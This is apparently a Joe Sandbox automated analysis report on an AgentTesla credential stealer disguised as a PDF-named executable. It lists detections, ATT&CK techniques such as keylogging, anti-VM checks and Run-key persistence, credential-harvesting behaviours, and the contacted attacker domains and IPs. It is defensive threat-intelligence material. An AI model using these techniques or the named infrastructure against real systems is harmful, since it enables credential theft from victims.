                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 7040, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 2092, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 1216, type: MEMORY
                      Source: Yara matchFile source: 18.2.NewApp.exe.42f16b0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42ac090.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.3855070.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.380fa50.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.3855070.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.380fa50.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42ac090.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42f16b0.7.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Obfuscated Files or Information1Input Capture211System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSSecurity Software Discovery431Distributed Component Object ModelInput Capture211Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion25SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol112Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion25Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 356536 Sample: A4-058000200390-10-14_REV_pdf.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 70 Found malware configuration 2->70 72 Multi AV Scanner detection for submitted file 2->72 74 Yara detected AgentTesla 2->74 76 3 other signatures 2->76 7 NewApp.exe 14 3 2->7         started        11 A4-058000200390-10-14_REV_pdf.exe 15 3 2->11         started        13 NewApp.exe 2->13         started        process3 dnsIp4 78 Multi AV Scanner detection for dropped file 7->78 80 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->80 82 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->82 84 Contains functionality to register a low level keyboard hook 7->84 15 NewApp.exe 7->15         started        19 cmd.exe 7->19         started        21 WerFault.exe 7->21         started        52 coroloboxorozor.com 104.21.71.230, 49734, 49753, 49764 CLOUDFLARENETUS United States 11->52 54 192.168.2.1 unknown unknown 11->54 86 Hides threads from debuggers 11->86 88 Injects a PE file into a foreign processes 11->88 90 Contains functionality to hide a thread from the debugger 11->90 23 A4-058000200390-10-14_REV_pdf.exe 2 9 11->23         started        26 cmd.exe 1 11->26         started        28 WerFault.exe 23 9 11->28         started        30 cmd.exe 13->30         started        32 NewApp.exe 13->32         started        34 WerFault.exe 13->34         started        signatures5 process6 dnsIp7 58 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->58 60 Tries to steal Mail credentials (via file access) 15->60 62 Tries to harvest and steal ftp login credentials 15->62 64 Tries to harvest and steal browser information (history, passwords, etc) 15->64 36 conhost.exe 19->36         started        38 timeout.exe 19->38         started        56 mail.soonlogistics.com 103.17.211.69, 49763, 49765, 49775 IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY Malaysia 23->56 48 C:\Users\user\AppData\Roaming\...48ewApp.exe, PE32 23->48 dropped 50 C:\Users\user\...50ewApp.exe:Zone.Identifier, ASCII 23->50 dropped 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->66 68 Installs a global keyboard hook 23->68 40 conhost.exe 26->40         started        42 timeout.exe 1 26->42         started        44 conhost.exe 30->44         started        46 timeout.exe 30->46         started        file8 signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      A4-058000200390-10-14_REV_pdf.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\NewApp\NewApp.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      31.2.NewApp.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      24.2.NewApp.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      coroloboxorozor.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://mail.soonlogistics.com0%Avira URL Cloudsafe
                      http://coroloboxorozor.com/base/BE0C9BE287721D2E1639C8881BC9F105.html0%Avira URL Cloudsafe
                      http://2nUtGMgnxihCA8N2g.org0%Avira URL Cloudsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://coroloboxorozor.com0%Avira URL Cloudsafe
                      http://coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.html0%Avira URL Cloudsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://r3.i.lencr.org/00%URL Reputationsafe
                      http://r3.i.lencr.org/00%URL Reputationsafe
                      http://r3.i.lencr.org/00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      coroloboxorozor.com
                      		104.21.71.230
                      		truefalseunknown
                      mail.soonlogistics.com
                      		103.17.211.69
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://coroloboxorozor.com/base/BE0C9BE287721D2E1639C8881BC9F105.htmlfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://2nUtGMgnxihCA8N2g.orgtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.htmlfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                		high
                                http://cps.letsencrypt.org0A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                  		high
                                  http://mail.soonlogistics.comA4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.916340708.0000000002FFB000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916097296.0000000002A24000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                    		high
                                    http://r3.o.lencr.org0A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                            		high
                                            http://coroloboxorozor.comA4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameA4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://cps.root-x1.letsencrypt.org0A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://r3.i.lencr.org/0A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.21.71.230
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    103.17.211.69
                                                    		unknownMalaysia
                                                    		45352IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMYtrue

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:356536
                                                    Start date:23.02.2021
                                                    Start time:09:46:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 14m 14s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:A4-058000200390-10-14_REV_pdf.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:37
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@27/16@6/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 0% (good quality ratio 0%)
                                                    • Quality average: 0%
                                                    • Quality standard deviation: 0%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 229
                                                    • Number of non-executed functions: 2
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 92.122.145.220, 52.147.198.201, 13.64.90.137, 51.104.139.180, 52.155.217.156, 20.54.26.129, 67.26.83.254, 8.248.117.254, 8.248.143.254, 8.253.95.120, 8.248.119.254, 92.122.213.247, 92.122.213.194, 104.43.193.48, 40.88.32.150, 51.104.144.132
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    09:47:13API Interceptor3x Sleep call for process: WerFault.exe modified
                                                    09:47:15API Interceptor608x Sleep call for process: A4-058000200390-10-14_REV_pdf.exe modified
                                                    09:47:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NewApp C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    09:47:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NewApp C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    09:48:11API Interceptor282x Sleep call for process: NewApp.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    104.21.71.230Purchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html
                                                    0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
                                                    VIws8bzjD5.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
                                                    quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
                                                    PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/13F70A6846505248D031FD970E34143C.html
                                                    PAYRECEIPT.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
                                                    New Order.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/787C0D9D971EA648C79BB43D6A91B32D.html
                                                    TT.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
                                                    Payment_pdf.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
                                                    TT.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
                                                    purchase order 1.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html
                                                    telex transfer.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/EB6932098F110FB9EB9C8B27A1730610.html
                                                    ORDER PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/20872932CF927ACBA3BF36E6C823C99C.html
                                                    Doc_3975465846584657465846486435454,pdf.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html
                                                    CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/38A59769F794F78901E2621810DAAA3A.html
                                                    CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
                                                    Download_quotation_PR #371073.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
                                                    CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
                                                    PurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    mail.soonlogistics.comSecuriteInfo.com.Gen.NN.ZemsilCO.34804.so0@a88aQDc.exeGet hashmaliciousBrowse
                                                    • 103.17.211.69
                                                    SecuriteInfo.com.Variant.MSILPerseus.227807.2953.exeGet hashmaliciousBrowse
                                                    • 103.17.211.69
                                                    coroloboxorozor.comPurchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Payment_pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    RG6ws8jWUJ.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    VIws8bzjD5.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    XP 6.xlsxGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    PAYRECEIPT.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    New Order.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    PO#87498746510.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    TT.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Payment_pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    TT.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    purchase order 1.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    telex transfer.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    Invoices.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    CLOUDFLARENETUSSecuriteInfo.com.Trojan.GenericKD.36273230.25906.exeGet hashmaliciousBrowse
                                                    • 104.21.50.15
                                                    v2.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    Purchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Payment_pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    8WjU4jrBIr.exeGet hashmaliciousBrowse
                                                    • 104.23.98.190
                                                    RG6ws8jWUJ.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                    • 104.23.99.190
                                                    lpdKSOB78u.exeGet hashmaliciousBrowse
                                                    • 104.21.76.239
                                                    VIws8bzjD5.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Halkbank_Ekstre_20210223_082357_541079.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    FOB offer_1164087223_I0133P2100363812.PDF.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
